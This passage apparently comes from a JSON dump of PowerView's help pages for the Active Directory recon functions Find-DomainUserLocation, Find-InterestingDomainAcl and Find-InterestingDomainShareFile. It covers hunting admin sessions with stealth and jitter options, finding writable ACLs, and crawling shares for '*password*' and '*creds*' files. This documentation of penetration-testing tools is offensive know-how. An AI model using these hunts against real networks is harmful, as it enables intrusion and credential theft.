[-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]\r\n```\r\n\r\n### UserIdentity\r\n```\r\nFind-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]\r\n [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]\r\n [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]\r\n [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>]\r\n [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]\r\n```\r\n\r\n### ShowAll\r\n```\r\nFind-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]\r\n [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]\r\n [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]\r\n [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserAdminCount]\r\n [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]\r\n [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>]\r\n [-Jitter <Double>] [-ShowAll] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function enumerates all machines on the current (or specified) domain\r\nusing Get-DomainComputer, and queries the domain for users of a specified group\r\n(default 'Domain Admins') with Get-DomainGroupMember.\r\nThen for each server the\r\nfunction enumerates any active user sessions with Get-NetSession/Get-NetLoggedon\r\nThe found user list is compared against the target list, and any matches are\r\ndisplayed.\r\nIf -ShowAll is specified, all results are displayed instead of\r\nthe filtered set.\r\nIf -Stealth is specified, then likely highly-trafficed servers\r\nare enumerated with Get-DomainFileServer/Get-DomainController, and session\r\nenumeration is executed only against those servers.\r\nIf -Credential is passed,\r\nthen Invoke-UserImpersonation is used to impersonate the specified user\r\nbefore enumeration, reverting after with Invoke-RevertToSelf.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nFind-DomainUserLocation\r\n```\r\n\r\nSearches for 'Domain Admins' by enumerating every computer in the domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nFind-DomainUserLocation -Stealth -ShowAll\r\n```\r\n\r\nEnumerates likely highly-trafficked servers, performs just session enumeration\r\nagainst each, and outputs all results.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nFind-DomainUserLocation -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local\r\n```\r\n\r\nEnumerates Windows 7 computers in dev.testlab.local and returns user results for privileged\r\nusers in dev.testlab.local.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nFind-DomainUserLocation -Domain testlab.local -Credential $Cred\r\n\r\nSearches for domain admin locations in the testlab.local using the specified alternate credentials.\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies an array of one or more hosts to enumerate, passable on the pipeline.\r\nIf -ComputerName is not passed, the default behavior is to enumerate all machines\r\nin the domain returned by Get-DomainComputer.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DNSHostName\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to query for computers AND users, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerDomain\r\nSpecifies the domain to query for computers, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerLDAPFilter\r\nSpecifies an LDAP query string that is used to search for computer objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerSearchBase\r\nSpecifies the LDAP source to search through for computers,\r\ne.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\".\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerUnconstrained\r\nSwitch.\r\nSearch computer objects that have unconstrained delegation.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: Unconstrained\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerOperatingSystem\r\nSearch computers with a specific operating system, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: OperatingSystem\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerServicePack\r\nSearch computers with a specific service pack, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ServicePack\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerSiteName\r\nSearch computers in the specific AD Site name, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: SiteName\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserIdentity\r\nSpecifies one or more user identities to search for.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: UserIdentity\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserDomain\r\nSpecifies the domain to query for users to search for, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserLDAPFilter\r\nSpecifies an LDAP query string that is used to search for target users.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserSearchBase\r\nSpecifies the LDAP source to search through for target users.\r\ne.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\".\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserGroupIdentity\r\nSpecifies a group identity to query for target users, defaults to 'Domain Admins.\r\nIf any other user specifications are set, then UserGroupIdentity is ignored.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: UserGroupIdentity\r\nAliases: GroupName, Group\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Domain Admins\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserAdminCount\r\nSwitch.\r\nSearch for users users with '(adminCount=1)' (meaning are/were privileged).\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: AdminCount\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserAllowDelegation\r\nSwitch.\r\nSearch for user accounts that are not marked as 'sensitive and not allowed for delegation'.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: AllowDelegation\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -CheckAccess\r\nSwitch.\r\nCheck if the current user has local admin access to computers where target users are found.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain and target systems.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -StopOnSuccess\r\nSwitch.\r\nStop hunting after finding after finding a target user.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Delay\r\nSpecifies the delay (in seconds) between enumerating hosts, defaults to 0.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Jitter\r\nSpecifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3\r\n\r\n```yaml\r\nType: Double\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0.3\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ShowAll\r\nSwitch.\r\nReturn all user location results instead of filtering based on target\r\nspecifications.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: ShowAll\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Stealth\r\nSwitch.\r\nOnly enumerate sessions from connonly used target servers.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -StealthSource\r\nThe source of target servers to use, 'DFS' (distributed file servers),\r\n'DC' (domain controllers), 'File' (file servers), or 'All' (the default).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: All\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Threads\r\nThe number of threads to use for user searching, defaults to 20.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 20\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.UserLocation\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Find-InterestingDomainAcl.md",
    "content": "# Find-InterestingDomainAcl\r\n\r\n## SYNOPSIS\r\nFinds object ACLs in the current (or specified) domain with modification\r\nrights set to non-built in objects.\r\n\r\nThanks Sean Metcalf (@pyrotek3) for the idea and guidance.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainObjectAcl, Get-DomainObject, Convert-ADName\r\n\r\n## SYNTAX\r\n\r\n```\r\nFind-InterestingDomainAcl [[-Domain] <String>] [-ResolveGUIDs] [-RightsFilter <String>] [-LDAPFilter <String>]\r\n [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]\r\n [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function enumerates the ACLs for every object in the domain with Get-DomainObjectAcl,\r\nand for each returned ACE entry it checks if principal security identifier\r\nis *-1000 (meaning the account is not built in), and also checks if the rights for\r\nthe ACE mean the object can be modified by the principal.\r\nIf these conditions are met,\r\nthen the security identifier SID is translated, the domain object is retrieved, and\r\nadditional IdentityReference* information is appended to the output object.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nFind-InterestingDomainAcl\r\n```\r\n\r\nFinds interesting object ACLS in the current domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nFind-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs\r\n```\r\n\r\nFinds interesting object ACLS in the ev.testlab.local domain and\r\nresolves rights GUIDs to display names.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nFind-InterestingDomainAcl -Credential $Cred -ResolveGUIDs\r\n\r\n## PARAMETERS\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainName, Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResolveGUIDs\r\nSwitch.\r\nResolve GUIDs to their display names.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -RightsFilter\r\n{{Fill RightsFilter Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.ACL\r\n\r\nCustom PSObject with ACL entries.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Find-InterestingDomainShareFile.md",
    "content": "# Find-InterestingDomainShareFile\r\n\r\n## SYNOPSIS\r\nSearches for files matching specific criteria on readable shares\r\nin the domain.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, Find-InterestingFile, New-ThreadedFunction\r\n\r\n## SYNTAX\r\n\r\n### FileSpecification (Default)\r\n```\r\nFind-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]\r\n [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]\r\n [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-Include <String[]>] [-SharePath <String[]>]\r\n [-ExcludedShares <String[]>] [-LastAccessTime <DateTime>] [-LastWriteTime <DateTime>]\r\n [-CreationTime <DateTime>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]\r\n [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>]\r\n [-Threads <Int32>]\r\n```\r\n\r\n### OfficeDocs\r\n```\r\nFind-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]\r\n [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]\r\n [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-SharePath <String[]>]\r\n [-ExcludedShares <String[]>] [-OfficeDocs] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]\r\n```\r\n\r\n### FreshEXEs\r\n```\r\nFind-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]\r\n [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]\r\n [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-SharePath <String[]>]\r\n [-ExcludedShares <String[]>] [-FreshEXEs] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]\r\n [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>]\r\n [-Threads <Int32>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function enumerates all machines on the current (or specified) domain\r\nusing Get-DomainComputer, and enumerates the available shares for each\r\nmachine with Get-NetShare.\r\nIt will then use Find-InterestingFile on each\r\nreadhable share, searching for files marching specific criteria.\r\nIf -Credential\r\nis passed, then Invoke-UserImpersonation is used to impersonate the specified\r\nuser before enumeration, reverting after with Invoke-RevertToSelf.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nFind-InterestingDomainShareFile\r\n```\r\n\r\nFinds 'interesting' files on the current domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nFind-InterestingDomainShareFile -ComputerName @('windows1.testlab.local','windows2.testlab.local')\r\n```\r\n\r\nFinds 'interesting' files on readable shares on the specified systems.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('DEV\\dfm.a', $SecPassword)\r\nFind-DomainShare -Domain testlab.local -Credential $Cred\r\n\r\nSearches interesting files in the testlab.local domain using the specified alternate credentials.\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies an array of one or more hosts to enumerate, passable on the pipeline.\r\nIf -ComputerName is not passed, the default behavior is to enumerate all machines\r\nin the domain returned by Get-DomainComputer.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DNSHostName\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerDomain\r\nSpecifies the domain to query for computers, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerLDAPFilter\r\nSpecifies an LDAP query string that is used to search for computer objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerSearchBase\r\nSpecifies the LDAP source to search through for computers,\r\ne.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\".\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerOperatingSystem\r\nSearch computers with a specific operating system, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: OperatingSystem\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerServicePack\r\nSearch computers with a specific service pack, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ServicePack\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerSiteName\r\nSearch computers in the specific AD Site name, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: SiteName\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Include\r\nOnly return files/folders that match the specified array of strings,\r\ni.e.\r\n@(*.doc*, *.xls*, *.ppt*)\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: FileSpecification\r\nAliases: SearchTerms, Terms\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config')\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SharePath\r\nSpecifies one or more specific share paths to search, in the form \\\\\\\\COMPUTER\\Share\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: Share\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ExcludedShares\r\nSpecifies share paths to exclude, default of C$, Admin$, Print$, IPC$.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: @('C$', 'Admin$', 'Print$', 'IPC$')\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LastAccessTime\r\nOnly return files with a LastAccessTime greater than this date value.\r\n\r\n```yaml\r\nType: DateTime\r\nParameter Sets: FileSpecification\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LastWriteTime\r\nOnly return files with a LastWriteTime greater than this date value.\r\n\r\n```yaml\r\nType: DateTime\r\nParameter Sets: FileSpecification\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -CreationTime\r\nOnly return files with a CreationTime greater than this date value.\r\n\r\n```yaml\r\nType: DateTime\r\nParameter Sets: FileSpecification\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -OfficeDocs\r\nSwitch.\r\nSearch for office documents (*.doc*, *.xls*, *.ppt*)\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: OfficeDocs\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -FreshEXEs\r\nSwitch.\r\nFind .EXEs accessed within the last 7 days.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: FreshEXEs\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 